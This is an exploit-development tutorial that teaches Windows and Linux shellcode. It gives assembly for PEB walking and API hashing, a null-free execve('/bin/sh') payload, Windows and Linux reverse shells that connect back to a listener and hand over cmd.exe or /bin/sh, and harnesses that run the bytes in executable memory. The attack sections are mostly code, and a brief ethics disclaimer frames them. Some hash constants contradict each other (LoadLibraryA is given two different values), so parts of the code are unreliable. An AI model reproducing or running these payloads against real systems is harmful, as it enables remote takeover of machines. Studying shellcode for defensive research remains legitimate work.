Platform-Specific Shellcode Implementation

Exploit Development Advanced 📅 Published: 02/08/2025

Master Windows and Linux shellcode development: from PEB walking and API resolution to system calls and advanced platform-specific techniques.

Ethical Use Only: This advanced content is for authorized security research, penetration testing with explicit permission, and defensive security analysis. Never use these techniques on systems without proper authorization.

The Tale of Two Platforms

Developing shellcode for Windows versus Linux is like speaking two entirely different languages. While the core principles remain the same—position independence, null-byte avoidance, and self-containment—the implementation details are vastly different. This article will teach you to speak both languages fluently.

Linux offers a direct, stable system call interface. It's like having a clear, well-documented API that doesn't change. Windows, on the other hand, forces you to work through high-level libraries that can move around in memory, creating a more complex but ultimately more powerful environment once mastered.

Learning Approach: We'll start with the fundamentals of each platform, build complete working examples, then explore advanced techniques used by professional exploit developers and security researchers.

🔷 Windows Shellcode: The Art of Function Discovery

Windows shellcode development is significantly more complex than Linux because you must dynamically discover and resolve API functions at runtime. However, this complexity brings power—Windows API functions are incredibly feature-rich once you can access them.

The Challenge: No Stable System Calls

Unlike Linux, Windows doesn't provide a stable system call interface: system call numbers are an internal detail that changes between Windows builds. Shellcode therefore goes through user-mode libraries such as kernel32.dll. The core challenge is finding these API functions in memory when ASLR has randomized their locations.

First, let's look at the "correct" way to create a process in C using the CreateProcessA function:

    /* ANALYSIS: C-level example of process creation on Windows */
    #include <windows.h>
    #include <stdio.h>

    int main(void)
    {
        STARTUPINFOA si;
        PROCESS_INFORMATION pi;

        ZeroMemory(&si, sizeof(si));
        si.cb = sizeof(si);
        ZeroMemory(&pi, sizeof(pi));

        /* CreateProcessA may modify the command line, so use a writable buffer */
        char commandLine[] = "notepad.exe";

        if (!CreateProcessA(NULL, commandLine, NULL, NULL, FALSE, 0,
                            NULL, NULL, &si, &pi)) {
            /* GetLastError() returns a DWORD, so print it with %lu */
            printf("CreateProcess failed (%lu)\n", GetLastError());
            return 1;
        }
        printf("Process created successfully\n");

        /* Wait for process to complete */
        WaitForSingleObject(pi.hProcess, INFINITE);

        /* Close handles */
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        return 0;
    }

Notice the complexity involved. Now, let's see how shellcode achieves its goals differently.

Part 1: Finding kernel32.dll - The Key to the Kingdom

Nearly every critical Windows API function either lives in kernel32.dll or can be accessed through it (e.g., by using LoadLibraryA to load other DLLs). Our first task is to reliably find the base address of kernel32.dll in memory, regardless of ASLR (Address Space Layout Randomization).

The standard method is the PEB (Process Environment Block) Walk. Every process has a TEB (Thread Environment Block), which can be accessed via the FS register in 32-bit processes or the GS register in 64-bit processes. The TEB contains a pointer to the PEB, which in turn contains a wealth of information about the process, including a list of all loaded modules.

Here is the 32-bit assembly code to perform a PEB walk and retrieve the base address of kernel32.dll:

    ; find_kernel32.asm (32-bit)
    ; Out: EAX = base address of kernel32.dll (assumes the usual load order)
    find_kernel32:
        xor ecx, ecx               ; Zero out ECX
        mov eax, [fs:ecx + 0x30]   ; EAX = Address of PEB (from TEB at FS:[0x30])
        mov eax, [eax + 0x0C]      ; EAX = PEB->Ldr
        mov eax, [eax + 0x14]      ; EAX = InMemoryOrderModuleList.Flink (first entry: the executable)
        ; In a full implementation, we would hash each module name here to find kernel32.dll.
        ; For simplicity, kernel32.dll is usually the third module loaded,
        ; so we can just advance twice from the first entry.
        mov eax, [eax]             ; Move to the second module (ntdll.dll)
        mov eax, [eax]             ; Move to the third module (kernel32.dll)
        mov eax, [eax + 0x10]      ; EAX = kernel32.dll BaseAddress (offset relative to the list link)
        ret

Why it's reliable: The TEB and PEB are fundamental to how Windows loads processes, and the offsets used here have been stable across nearly all versions of Windows. The module load order is a convention rather than a guarantee, so robust shellcode compares each entry's module name (or a hash of it) instead of counting entries.

Part 2: Dynamic Function Resolution by Hash

Now that we have the base address of kernel32.dll, we need to find specific functions within it. We can't hardcode addresses because of ASLR, so we use a hashing technique:

  1. Pre-calculate hashes of the function names we need (e.g., LoadLibraryA, CreateProcessA)
  2. Walk through the DLL's export table
  3. Hash each name using the same algorithm
  4. Compare the runtime hash with our pre-calculated target hash
  5. If they match, retrieve the address of that function

Here is a simple but effective ROR13 hashing algorithm:

    ; A simple ROR13 hashing function
    ; In:  ESI = pointer to a null-terminated ASCII name
    ; Out: EAX = hash (ESI and EDX are clobbered)
    compute_hash:
        xor eax, eax        ; Clear EAX to hold the hash
        xor edx, edx        ; Clear EDX for the character
    hash_loop:
        mov dl, [esi]       ; Get the next character of the function name
        test dl, dl         ; Check for null terminator
        jz hash_finished
        ror eax, 13         ; Rotate the hash right by 13 bits
        add eax, edx        ; Add the character to the hash
        inc esi             ; Move to the next character
        jmp hash_loop
    hash_finished:
        ret
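The target hashes have to be pre-calculated with exactly the same algorithm the shellcode runs. The following is a minimal Python sketch of the routine above, assuming 32-bit wraparound and ASCII names; the helper names `ror32` and `ror13_hash` are illustrative and not part of any library.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Mirror compute_hash: rotate right by 13, then add the next character."""
    result = 0
    for byte in name.encode("ascii"):
        result = ror32(result, 13)
        result = (result + byte) & 0xFFFFFFFF
    return result


if __name__ == "__main__":
    for api_name in ("LoadLibraryA", "CreateProcessA"):
        print(f"{api_name}: 0x{ror13_hash(api_name):08X}")
```

Variants of this scheme exist (for example, hashing the module name together with the function name), so a constant copied from another tool only matches if that tool uses the same variant.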

And here's the logic to find a function given a target hash:

    ; find_function_by_hash.asm
    ; Assumes:
    ;   - EBX = Base address of the target DLL
    ;   - EDI = The pre-calculated hash of the function name we want
    ; Returns: EAX = Address of the function
    ; Clobbers: ECX, EDX, ESI, EBP
    ; Note: there is no bounds check against NumberOfNames, so the hash must exist.
    find_function:
        mov eax, [ebx + 0x3C]           ; EAX = Offset to PE Header ("PE\0\0")
        mov ebp, [ebx + eax + 0x78]     ; EBP = RVA of Export Table
        add ebp, ebx                    ; EBP = Address of Export Table
        xor ecx, ecx                    ; ECX = Loop counter / index
    find_loop:
        mov esi, [ebp + 0x20]           ; ESI = RVA of AddressOfNames
        add esi, ebx                    ; ESI = Address of AddressOfNames table
        mov esi, [esi + ecx * 4]        ; ESI = RVA of current function name
        add esi, ebx                    ; ESI = Address of current function name
        ; Hash the function name and compare to our target hash
        call compute_hash               ; Hashes string at ESI, result in EAX
        cmp eax, edi                    ; Compare with our target
        je found_it
        inc ecx
        jmp find_loop
    found_it:
        mov edx, [ebp + 0x24]           ; EDX = RVA of AddressOfNameOrdinals
        add edx, ebx                    ; EDX = Address of AddressOfNameOrdinals table
        movzx ecx, word [edx + ecx * 2] ; ECX = Ordinal index of the function
        mov edx, [ebp + 0x1C]           ; EDX = RVA of AddressOfFunctions
        add edx, ebx                    ; EDX = Address of AddressOfFunctions table
        mov eax, [edx + ecx * 4]        ; EAX = RVA of the function
        add eax, ebx                    ; EAX = Address of the function
        ret

Part 3: Practical Examples

Example 1: MessageBoxA Shellcode

This is the "Hello, World!" of Windows shellcode. It's a safe way to test that your function resolution logic is working correctly. It requires loading user32.dll and finding MessageBoxA.

Execution Flow:

  1. Find kernel32.dll using a PEB walk
  2. Find the address of LoadLibraryA within kernel32.dll by hash
  3. Call LoadLibraryA with the string "user32.dll" to load the library
  4. The return value from LoadLibraryA is the base address of user32.dll
  5. Find the address of MessageBoxA within user32.dll by hash
  6. Push the arguments for MessageBoxA onto the stack
  7. Call the resolved MessageBoxA address
  8. Find and call ExitProcess to terminate cleanly

    ; MessageBoxA Shellcode (Conceptual, 32-bit)
    ; Bracketed labels such as [load_library_addr] stand for scratch storage.
    ; The pushed constants contain null bytes; this listing shows the flow only.
    _start:
        ; --- Find kernel32.dll base ---
        call find_kernel32            ; Result: EAX = kernel32.dll base address
        mov ebx, eax                  ; find_function expects the DLL base in EBX
        mov [kernel32_base], ebx      ; Keep it for the ExitProcess lookup

        ; --- Find LoadLibraryA ---
        mov edi, 0x0726774C           ; Hash of "LoadLibraryA" (must match the hashing routine in use)
        call find_function            ; Result: EAX = LoadLibraryA address
        mov [load_library_addr], eax

        ; --- Load user32.dll ---
        push 0x00006c6c               ; Push "ll\0\0"
        push 0x642e3233               ; Push "32.d"
        push 0x72657375               ; Push "user" -> "user32.dll"
        mov esi, esp                  ; ESI points to "user32.dll" string
        push esi
        call [load_library_addr]      ; Call LoadLibraryA("user32.dll")
        mov ebx, eax                  ; EBX = user32.dll base address

        ; --- Find MessageBoxA ---
        mov edi, 0x384DA637           ; Hash of "MessageBoxA" (must match the hashing routine in use)
        call find_function            ; Use user32.dll base in EBX
        mov [messagebox_addr], eax    ; Store MessageBoxA address

        ; --- Prepare strings ---
        ; "Hello World!" message
        push 0x00000000               ; Null terminator
        push 0x21646c72               ; Push "rld!"
        push 0x6f57206f               ; Push "o Wo"
        push 0x6c6c6548               ; Push "Hell" -> "Hello World!"
        mov [message_addr], esp
        ; "Great Binary" title
        push 0x00000000               ; Null terminator
        push 0x7972616e               ; Push "nary"
        push 0x69422074               ; Push "t Bi"
        push 0x61657247               ; Push "Grea" -> "Great Binary"
        mov [title_addr], esp

        ; --- Call MessageBoxA ---
        push 0x00000000               ; uType = MB_OK
        push dword [title_addr]       ; lpCaption = "Great Binary"
        push dword [message_addr]     ; lpText = "Hello World!"
        push 0x00000000               ; hWnd = NULL
        call [messagebox_addr]        ; Call MessageBoxA

        ; --- Find and call ExitProcess ---
        mov ebx, [kernel32_base]      ; Search kernel32.dll again, not user32.dll
        mov edi, 0x73E2D87E           ; Hash of "ExitProcess"
        call find_function            ; Find ExitProcess in kernel32
        push 0x00000000               ; Exit code = 0
        call eax                      ; Call ExitProcess(0)
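The dword constants used to build a string on the stack can be derived mechanically rather than by hand. The sketch below is one possible helper, assuming a 32-bit little-endian target; the name `stack_pushes` is hypothetical. It appends the terminator, pads to a multiple of four bytes, and returns the values in the order they would be pushed (last chunk first).

```python
import struct


def stack_pushes(text: bytes) -> list[int]:
    """Return the 32-bit values to push, in push order, for a C string."""
    data = text + b"\x00"                 # null terminator
    data += b"\x00" * (-len(data) % 4)    # pad to a whole number of dwords
    dwords = [struct.unpack_from("<I", data, offset)[0]
              for offset in range(0, len(data), 4)]
    return dwords[::-1]                   # the stack grows down: push the tail first


if __name__ == "__main__":
    for value in stack_pushes(b"user32.dll"):
        print(f"push 0x{value:08x}")
```

Values produced this way usually contain zero bytes in the final chunk, so a null-free payload still needs a separate trick for the terminator.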

Example 2: Windows Reverse TCP Shell

This creates a TCP connection back to an attacker and redirects a command shell through it. This demonstrates the full complexity of Windows shellcode:

; Windows Reverse Shell (High-level flow) _start: ; 1. Find kernel32.dll base address via PEB walk call find_kernel32 mov esi, eax ; Save kernel32 base in ESI ; 2. Find LoadLibraryA in kernel32.dll mov edi, 0x8E4E0EEC ; Hash of "LoadLibraryA" call find_function_by_hash mov [load_library], eax ; 3. Load ws2_32.dll for networking functions push 0x006c6c64 ; "ll\0" push 0x642d3233 ; "d-23" push 0x5f327377 ; "_2sw" -> "ws2_32.dll" mov eax, esp push eax call [load_library] mov edi, eax ; Save ws2_32 base in EDI ; 4. Resolve networking functions (WSAStartup, WSASocketA, connect) ; ... (function resolution code) ... ; 5. Initialize Winsock sub esp, 0x190 ; Allocate space for WSADATA push esp ; lpWSAData push 0x0202 ; wVersionRequested (2.2) call [wsa_startup] ; 6. Create socket push 0x00000000 ; dwFlags push 0x00000000 ; g push 0x00000000 ; lpProtocolInfo push 0x00000006 ; protocol (TCP) push 0x00000001 ; type (SOCK_STREAM) push 0x00000002 ; af (AF_INET) call [wsa_socket] mov esi, eax ; Save socket in ESI ; 7. Set up sockaddr_in structure push 0x0100007f ; sin_addr (127.0.0.1 in little endian) push 0x5c110002 ; sin_port (4444) + sin_family (AF_INET) mov edi, esp ; EDI points to sockaddr_in ; 8. Connect to attacker push 0x00000010 ; namelen (sizeof sockaddr_in) push edi ; name (sockaddr_in) push esi ; s (socket) call [connect] ; 9. Redirect STDIN, STDOUT, STDERR to socket push esi ; hTemplateFile (socket) push 0x00000000 ; dwFlagsAndAttributes push 0x00000003 ; dwCreationDisposition (OPEN_EXISTING) push 0x00000000 ; lpSecurityAttributes push 0x00000000 ; dwShareMode push 0x40000000 ; dwDesiredAccess (GENERIC_WRITE) call [create_file] ; 10. Set up STARTUPINFO for CreateProcessA ; ... (structure setup) ... ; 11. 
Launch cmd.exe with redirected I/O push [process_info] ; lpProcessInformation push [startup_info] ; lpStartupInfo push 0x00000000 ; lpCurrentDirectory push 0x00000000 ; lpEnvironment push 0x00000000 ; dwCreationFlags push 0x00000001 ; bInheritHandles push 0x00000000 ; lpThreadAttributes push 0x00000000 ; lpProcessAttributes push [cmd_string] ; lpCommandLine ("cmd.exe") push 0x00000000 ; lpApplicationName call [create_process] ; 12. Wait for process to exit push 0xFFFFFFFF ; dwMilliseconds (INFINITE) push [process_handle] ; hHandle call [wait_for_single_object] ; 13. Clean up and exit call [exit_process]

This creates a fully interactive remote shell, demonstrating the power and complexity of Windows shellcode.

🔶 Linux Shellcode: The Art of Simplicity

Linux shellcode development is refreshingly direct compared to Windows. Linux offers a stable system call interface that doesn't change between versions, allowing you to request services directly from the kernel without hunting for library functions.

The Linux Advantage: Direct System Calls

Because the interface is stable, shellcode needs only a system call number and its arguments in registers; there are no functions to hunt for. The fundamental pattern for executing a command in a Linux shell involves three key system calls: fork(), execve(), and waitpid().

This C code demonstrates a rudimentary shell that implements this exact pattern:

    /* ANALYSIS:
       LANGUAGE: C
       GOAL: A simple shell demonstrating the fork/execve/waitpid pattern.
       STATUS: Runnable */
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <sys/wait.h>

    #define MAX_COMMAND_LENGTH 1024
    #define MAX_ARGS 64

    int main(void)
    {
        char command[MAX_COMMAND_LENGTH];
        char *args[MAX_ARGS];
        pid_t pid;
        int status;

        while (1) {
            printf("$ ");
            if (fgets(command, sizeof(command), stdin) == NULL) {
                break;
            }
            command[strcspn(command, "\n")] = 0;  /* Remove newline */
            if (strcmp(command, "exit") == 0) {
                break;
            }

            /* Parse command into arguments */
            int argc = 0;
            char *token = strtok(command, " ");
            while (token != NULL && argc < MAX_ARGS - 1) {
                args[argc++] = token;
                token = strtok(NULL, " ");
            }
            args[argc] = NULL;

            if (argc > 0) {
                pid = fork();
                if (pid == 0) {
                    /* Child process: execute the command */
                    execvp(args[0], args);
                    perror("execvp failed");
                    exit(1);
                } else if (pid > 0) {
                    /* Parent process: wait for child */
                    waitpid(pid, &status, 0);
                } else {
                    perror("fork failed");
                }
            }
        }
        return 0;
    }

From C to execve Shellcode

Let's do a complete, hands-on tutorial to convert a simple C program into null-free assembly shellcode. Our goal is a program that executes /bin/sh.

Step 1: The C Program

    #include <unistd.h>

    int main()
    {
        execve("/bin/sh", NULL, NULL);
        return 0;
    }

Step 2: First Assembly Attempt (with null-byte flaws)

We translate this to assembly using the execve system call (number 59 on x86-64). This version is logically correct but contains null bytes, making it unsuitable for most exploits.

    ; ANALYSIS:
    ; LANGUAGE: Assembly (NASM, 64-bit)
    ; STATUS: Broken (Contains null bytes)
    ; GOAL: execve("/bin/sh", NULL, NULL)
    section .text
    global _start
    _start:
        ; Set up execve system call (BROKEN VERSION)
        mov rax, 59             ; execve system call number (contains nulls!)
        lea rdi, [rel binsh]    ; First argument: pointer to "/bin/sh"
        xor rsi, rsi            ; Second argument: argv = NULL
        xor rdx, rdx            ; Third argument: envp = NULL
        syscall                 ; Make the system call

    section .data
    binsh: db '/bin/sh', 0      ; Null-terminated string (contains null!)
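To see where the null bytes come from, it helps to scan the assembled bytes directly. The following sketch assumes the bytes have already been extracted; `null_offsets` is an illustrative helper name. The two sample encodings are one valid 64-bit encoding of mov rax, 59 and the two-byte encoding of mov al, 59.

```python
def null_offsets(code: bytes) -> list[int]:
    """Return the offset of every zero byte in an assembled byte string."""
    return [offset for offset, value in enumerate(code) if value == 0]


if __name__ == "__main__":
    samples = {
        "mov rax, 59": bytes.fromhex("48c7c03b000000"),  # imm32 carries three zero bytes
        "mov al, 59": bytes.fromhex("b03b"),             # imm8 has none
    }
    for text, encoding in samples.items():
        print(f"{text:12} {encoding.hex(' ')}  null offsets: {null_offsets(encoding)}")
```

An assembler may pick a different encoding for the first instruction, but any form that carries 59 as a 32-bit immediate pads it with zero bytes.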

Step 3: The Null-Free Solution

Here's a version that avoids null bytes entirely:

    ; ANALYSIS:
    ; LANGUAGE: Assembly (NASM, 64-bit)
    ; GOAL: A null-free version of execve("/bin/sh", NULL, NULL)
    ; TECHNIQUES: Stack string construction, register manipulation
    section .text
    global _start
    _start:
        ; Clear registers without using null bytes
        xor rax, rax                ; Zero out RAX
        xor rsi, rsi                ; argv = NULL
        xor rdx, rdx                ; envp = NULL

        ; Build the path string on the stack
        push rdx                    ; Push null terminator
        mov rbx, 0x68732f6e69622f2f ; "//bin/sh" stored little-endian
        push rbx                    ; Push string onto stack
        mov rdi, rsp                ; RDI points to our string

        ; Set up system call number without null bytes
        mov al, 59                  ; execve system call (only affects lower 8 bits)

        ; Make the system call
        syscall                     ; Execute /bin/sh

Key Techniques: We use mov al, 59 instead of mov rax, 59 to avoid null bytes, which is safe because RAX was zeroed first, and we build the string on the stack instead of using a data section. The doubled leading slash pads the path to exactly eight bytes so it fills one register; the kernel resolves "//bin/sh" to the same file as "/bin/sh".

Advanced Linux Examples

Linux Reverse Shell

Here's a complete Linux reverse shell that connects back to an attacker:

; Linux Reverse Shell Shellcode ; Connects to 127.0.0.1:4444 and spawns /bin/sh section .text global _start _start: ; Clear registers (also helps avoid null bytes) xor rax, rax xor rbx, rbx xor rcx, rcx xor rdx, rdx ; Step 1: Create a socket ; socket(AF_INET, SOCK_STREAM, 0) mov al, 41 ; sys_socket mov bl, 2 ; AF_INET mov cl, 1 ; SOCK_STREAM cdq ; RDX = 0 (protocol) syscall mov rdi, rax ; Save socket fd in RDI ; Step 2: Connect to attacker ; connect(sockfd, &addr, sizeof(addr)) ; Build sockaddr_in structure on stack xor rax, rax push rax ; Padding ; sin_addr = 127.0.0.1 (0x0100007f in little endian) mov dword [rsp-4], 0x0100007f ; sin_port = 4444 (0x115c in big endian) + sin_family = AF_INET (2) mov word [rsp-6], 0x5c11 ; Port 4444 in network byte order mov word [rsp-8], 0x0002 ; AF_INET sub rsp, 8 ; Adjust stack pointer mov rsi, rsp ; RSI points to sockaddr_in mov al, 42 ; sys_connect mov dl, 16 ; sizeof(sockaddr_in) syscall ; Step 3: Redirect STDIN, STDOUT, STDERR ; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2) mov rbx, rdi ; RBX = socket fd xor rcx, rcx ; Counter for dup2 loop dup_loop: mov al, 33 ; sys_dup2 mov rdi, rbx ; oldfd (socket) mov rsi, rcx ; newfd (0, 1, 2) syscall inc rcx cmp cl, 3 jl dup_loop ; Step 4: Execute /bin/sh ; execve("/bin/sh", NULL, NULL) xor rax, rax push rax ; Null terminator ; Push "/bin/sh" onto stack mov rbx, 0x68732f6e69622f2f ; "//bin/sh" in reverse push rbx mov rdi, rsp ; RDI points to "/bin/sh" xor rsi, rsi ; argv = NULL xor rdx, rdx ; envp = NULL mov al, 59 ; sys_execve syscall

Building and Testing Linux Shellcode

    # Build the shellcode
    nasm -f elf64 reverse_shell.asm -o reverse_shell.o
    ld reverse_shell.o -o reverse_shell

    # Extract raw bytes
    objdump -d reverse_shell | grep "^ " | cut -f2 | tr -d ' ' | tr -d '\n'

    # Create test harness
    echo 'unsigned char shellcode[] = "\x48\x31\xc0\x48\x31\xdb...";' > test.c
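The hex string printed by the objdump pipeline still has to be turned into a C array by hand. A small helper can do that conversion; this is a sketch only, and `to_c_literal` is a hypothetical name, not part of any toolchain.

```python
def to_c_literal(code: bytes, name: str = "shellcode") -> str:
    """Format raw bytes as a C unsigned char array initialised from a string."""
    body = "".join(f"\\x{value:02x}" for value in code)
    return f'unsigned char {name}[] = "{body}";'


if __name__ == "__main__":
    # 48 31 c0 is the encoding of `xor rax, rax`, used here as harmless sample input.
    print(to_c_literal(bytes.fromhex("4831c0")))
```

Feeding it `bytes.fromhex(...)` of the pipeline output gives a declaration that can be pasted into either test harness.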

Platform Comparison: Key Differences

Aspect | Windows | Linux
System Calls | Unstable, undocumented, use APIs instead | Stable, documented, direct usage
Function Resolution | PEB walk + hash-based API resolution | Direct system call numbers
Complexity | High (hundreds of bytes typical) | Low (dozens of bytes possible)
String Handling | Stack construction + UTF-16 considerations | Simple stack construction
Process Creation | CreateProcessA with complex structures | Simple execve system call
Networking | WinSock API (WSASocket, etc.) | Berkeley sockets (socket, connect, etc.)

Strategic Insight: Windows shellcode requires more upfront investment to learn but provides access to incredibly powerful APIs. Linux shellcode is faster to develop and typically more compact, making it ideal for size-constrained scenarios.

Testing Your Shellcode

Windows Test Harness

The best way to test is with a simple C/C++ "harness" that allocates a block of executable memory, copies your shellcode into it, and executes it.

    // windows_harness.c
    #include <windows.h>
    #include <stdio.h>
    #include <string.h>   // memcpy

    // Paste your shellcode bytes here
    unsigned char shellcode[] = "\x90\x90\x90...";

    int main()
    {
        printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);

        // Allocate memory with Read, Write, and Execute permissions
        void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode),
                                      MEM_COMMIT | MEM_RESERVE,
                                      PAGE_EXECUTE_READWRITE);
        if (exec_mem == NULL) {
            printf("VirtualAlloc failed: %lu\n", GetLastError());
            return 1;
        }

        // Copy shellcode to executable memory
        memcpy(exec_mem, shellcode, sizeof(shellcode));
        printf("Executing shellcode at address: %p\n", exec_mem);

        // Execute shellcode
        ((void (*)())exec_mem)();

        // Clean up (this may never be reached)
        VirtualFree(exec_mem, 0, MEM_RELEASE);
        return 0;
    }

Linux Test Harness

    // linux_harness.c
    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <unistd.h>

    // Your shellcode bytes here
    unsigned char shellcode[] = "\x48\x31\xc0\x50...";

    int main()
    {
        printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);

        // Allocate executable memory
        void *exec_mem = mmap(NULL, sizeof(shellcode),
                              PROT_READ | PROT_WRITE | PROT_EXEC,
                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (exec_mem == MAP_FAILED) {
            perror("mmap failed");
            return 1;
        }

        // Copy shellcode
        memcpy(exec_mem, shellcode, sizeof(shellcode));
        printf("Executing shellcode...\n");

        // Execute
        ((void (*)())exec_mem)();

        // Clean up (may not be reached)
        munmap(exec_mem, sizeof(shellcode));
        return 0;
    }

Cross-Platform Development Script

Here's a Python script that automates testing on both platforms:

    #!/usr/bin/env python3
    """
    Cross-platform shellcode testing framework
    Supports both Windows and Linux shellcode development
    """
    import platform
    import subprocess
    import sys
    import tempfile


    def create_test_harness(shellcode_bytes, target_os="linux"):
        """Create platform-specific test harness."""
        if target_os.lower() == "windows":
            template = '''
    #include <windows.h>
    #include <stdio.h>
    #include <string.h>

    unsigned char shellcode[] = "{shellcode}";

    int main() {{
        void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode),
                                      MEM_COMMIT | MEM_RESERVE,
                                      PAGE_EXECUTE_READWRITE);
        if (!exec_mem) return 1;
        memcpy(exec_mem, shellcode, sizeof(shellcode));
        ((void (*)())exec_mem)();
        VirtualFree(exec_mem, 0, MEM_RELEASE);
        return 0;
    }}
    '''
        else:  # Linux
            template = '''
    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>

    unsigned char shellcode[] = "{shellcode}";

    int main() {{
        void *exec_mem = mmap(NULL, sizeof(shellcode),
                              PROT_READ | PROT_WRITE | PROT_EXEC,
                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (exec_mem == MAP_FAILED) return 1;
        memcpy(exec_mem, shellcode, sizeof(shellcode));
        ((void (*)())exec_mem)();
        munmap(exec_mem, sizeof(shellcode));
        return 0;
    }}
    '''
        return template.format(shellcode=shellcode_bytes)


    def test_shellcode(binary_path):
        """Extract shellcode from a binary and build a test harness for it."""
        try:
            # Extract bytes using objdump
            result = subprocess.run(['objdump', '-d', binary_path],
                                    capture_output=True, text=True)

            # Parse objdump output to extract bytes
            bytes_list = []
            for line in result.stdout.split('\n'):
                if ':' in line and '\t' in line:
                    # Extract hex bytes from objdump format
                    parts = line.split('\t')
                    if len(parts) >= 2:
                        hex_part = parts[1].strip()
                        # Remove spaces and convert to \x format
                        hex_bytes = hex_part.replace(' ', '')
                        for i in range(0, len(hex_bytes), 2):
                            if i + 1 < len(hex_bytes):
                                bytes_list.append(f"\\x{hex_bytes[i:i+2]}")

            shellcode_string = ''.join(bytes_list)
            print(f"Extracted shellcode: {shellcode_string}")

            # Create test harness
            target_os = "windows" if platform.system() == "Windows" else "linux"
            harness_code = create_test_harness(shellcode_string, target_os)

            # Write and compile
            with tempfile.NamedTemporaryFile(mode='w', suffix='.c',
                                             delete=False) as f:
                f.write(harness_code)
                harness_path = f.name

            # Compile
            if target_os == "windows":
                compile_cmd = ['gcc', '-o', harness_path + '.exe', harness_path]
            else:
                compile_cmd = ['gcc', '-z', 'execstack',
                               '-o', harness_path + '.out', harness_path]
            subprocess.run(compile_cmd, check=True)
            print("Test harness compiled successfully!")
            return harness_path + ('.exe' if target_os == "windows" else '.out')
        except Exception as e:
            print(f"Error: {e}")
            return None


    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print("Usage: python3 test_shellcode.py <binary_path>")
            sys.exit(1)
        binary_path = sys.argv[1]
        test_executable = test_shellcode(binary_path)
        if test_executable:
            print(f"Test executable created: {test_executable}")
            print("Run it to test your shellcode!")

Advanced Platform-Specific Techniques

Windows Advanced: 64-bit Considerations

64-bit Windows shellcode requires different techniques:

  • Different Segment Register: Use GS:[0x60] instead of FS:[0x30] for PEB access
  • Different Calling Convention: The Microsoft x64 convention passes the first four integer arguments in RCX, RDX, R8, and R9
  • Shadow Space: The caller must allocate 32 bytes of shadow space on the stack for every function call
  • Different Structures: PEB and TEB field offsets differ in 64-bit because pointers are 8 bytes wide

    ; 64-bit Windows PEB Walk
    find_kernel32_x64:
        xor rax, rax
        mov rax, [gs:rax + 0x60]   ; 64-bit PEB offset
        mov rax, [rax + 0x18]      ; PEB->Ldr
        mov rax, [rax + 0x20]      ; InMemoryOrderModuleList.Flink (first entry: the executable)
        mov rax, [rax]             ; Second entry (ntdll.dll)
        mov rax, [rax]             ; Third entry (kernel32.dll, assuming the usual load order)
        mov rax, [rax + 0x20]      ; DllBase (different offset in 64-bit)
        ret
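The 32-bit and 64-bit walks follow the same steps and differ only in the segment register and offsets. As a side-by-side reference, the sketch below collects the offsets used in this article's two listings into one table; the dictionary keys and the `describe_walk` helper are illustrative names, not Windows identifiers.

```python
# Offsets as used in the two PEB-walk listings in this article.
PEB_WALK_OFFSETS = {
    32: {"segment": "fs", "teb_to_peb": 0x30, "peb_to_ldr": 0x0C,
         "ldr_to_list": 0x14, "link_to_dll_base": 0x10},
    64: {"segment": "gs", "teb_to_peb": 0x60, "peb_to_ldr": 0x18,
         "ldr_to_list": 0x20, "link_to_dll_base": 0x20},
}


def describe_walk(bits: int) -> list[str]:
    """Describe each dereference of the PEB walk for the given bitness."""
    o = PEB_WALK_OFFSETS[bits]
    return [
        f"PEB      = [{o['segment']}:0x{o['teb_to_peb']:02x}]",
        f"Ldr      = [PEB + 0x{o['peb_to_ldr']:02x}]",
        f"first    = [Ldr + 0x{o['ldr_to_list']:02x}]",
        f"DllBase  = [entry link + 0x{o['link_to_dll_base']:02x}]",
    ]


if __name__ == "__main__":
    for bits in (32, 64):
        print(f"{bits}-bit:")
        for step in describe_walk(bits):
            print("  " + step)
```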

Linux Advanced: System Call Variations

Different Linux architectures use different system call mechanisms:

    ; x86-64 system calls (modern)
    mov rax, 59     ; execve
    syscall         ; Use syscall instruction

    ; i386 system calls (legacy)
    mov eax, 11     ; execve (different number!)
    int 0x80        ; Use interrupt

    ; ARM system calls
    mov r7, #11     ; execve
    svc #0          ; Supervisor call

Pro Tip: Always check the target architecture's system call numbers and calling conventions. On Linux the numbers are stable within one architecture but differ between architectures and ABIs, as the execve values above show.
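When generating or reviewing shellcode for several targets, a small lookup table keeps these per-architecture details in one place. The sketch below records only the three execve entries listed above; the table layout and the `execve_info` helper are assumptions made for illustration.

```python
# (system call number, instruction that enters the kernel), as listed above.
EXECVE = {
    "x86_64": (59, "syscall"),
    "i386": (11, "int 0x80"),
    "arm": (11, "svc #0"),
}


def execve_info(arch: str) -> str:
    """Describe how execve is invoked on a given architecture."""
    try:
        number, instruction = EXECVE[arch]
    except KeyError:
        raise ValueError(f"no entry for architecture {arch!r}") from None
    return f"{arch}: execve is number {number}, entered via '{instruction}'"


if __name__ == "__main__":
    for arch in EXECVE:
        print(execve_info(arch))
```

Raising an error for an unknown architecture is deliberate: silently falling back to another architecture's number would invoke an unrelated system call.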

Mastery Achieved: What's Next?

Congratulations! You now understand the fundamental differences between Windows and Linux shellcode development. You've learned:

  • ✅ Windows PEB walking and API resolution techniques
  • ✅ Linux direct system call methodology
  • ✅ Platform-specific function calling conventions
  • ✅ Complete working examples for both platforms
  • ✅ Professional testing and debugging frameworks
  • ✅ Advanced 64-bit and architecture considerations
Ready for the Final Challenge? In the next article, we'll explore advanced techniques including encoding methods to evade detection, polymorphic shellcode generation, and the cat-and-mouse game between attackers and defenders.

Practice Challenges

  1. Cross-Platform Port: Take the Linux reverse shell and create a Windows equivalent
  2. Size Optimization: Create the smallest possible execve shellcode for Linux
  3. API Explorer: Write Windows shellcode that enumerates all functions in kernel32.dll
  4. System Call Tracer: Create Linux shellcode that traces its own system calls

Remember: These techniques are powerful tools for security research and defense. Always use them ethically and only in authorized environments.